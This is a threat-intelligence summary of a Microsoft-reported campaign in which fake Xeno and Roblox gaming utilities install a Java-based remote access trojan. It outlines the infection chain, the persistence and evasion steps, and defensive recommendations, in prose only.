Key Findings

• Cybersecurity researchers at Microsoft Threat Intelligence have found that attackers are circulating fake gaming tools that install a remote access trojan (RAT) when users run the files.

• The campaign relies on trojanized executables distributed through browsers and chat platforms, convincing victims to download software such as Xeno.exe or RobloxPlayerBeta.exe, which appear legitimate at first glance.

• The initial file acts as a downloader that prepares the system for the next stage of the attack, installing a portable Java runtime and launching a malicious Java archive.

• The downloader runs commands through PowerShell and abuses legitimate system binaries such as cmstp.exe, allowing attackers to run malicious actions through software already present on Windows systems.

• The final malware functions as a loader, runner, downloader, and remote access tool, giving the attackers broad control over the compromised system.

Background

Microsoft Defender researchers uncovered a campaign that lured users into running trojanized gaming utilities (Xeno.exe or RobloxPlayerBeta.exe) distributed through browsers and chat platforms, leading to the deployment of a remote access trojan (RAT).

Infection Vector

• The campaign relies on trojanized executables distributed through browsers and chat platforms, convincing victims to download software that appears legitimate at first glance.

• The initial file acts as a downloader that prepares the system for the next stage of the attack, installing a portable Java runtime and launching a malicious Java archive named jd-gui.jar.

Malicious Payload

• Instead of relying on obvious malware components, the attackers rely on built-in Windows tools, running commands through PowerShell and abusing legitimate system binaries such as cmstp.exe.

• The PowerShell script included in the attack chain attempts to contact several remote locations and download an executable into the user's local application data directory.

• The final malware functions as a loader, runner, downloader, and remote access tool, giving the attackers broad control over the compromised system.

Persistence and Evasion

• The malware modifies Microsoft Defender settings by adding exclusions for the malicious files, allowing the RAT components to run without interference from the security engine.

• It also adds persistence through scheduled tasks and a startup script named world.vbs, allowing the malware to restart after a reboot and giving attackers long-term access to the infected device.

Recommendations

• Microsoft Defender already detects the malware and behavior patterns used in this campaign, but the company advises organizations to monitor outbound traffic and block connections to the domains and IP addresses listed in the indicators of compromise.

• Microsoft urges companies to take a look at Microsoft Defender exclusions and scheduled tasks for anything unusual, and review and remove any suspicious entries as part of the incident response process.

• Users should be cautious when downloading and running gaming tools or other software, especially from unofficial sources, as they can hide malware behind familiar names.

Sources

• https://hackread.com/microsoft-fake-xeno-roblox-utilities-windows-rat/

• https://news.backbox.org/2026/03/01/fake-xeno-and-roblox-utilities-used-to-install-windows-rat-microsoft-warns/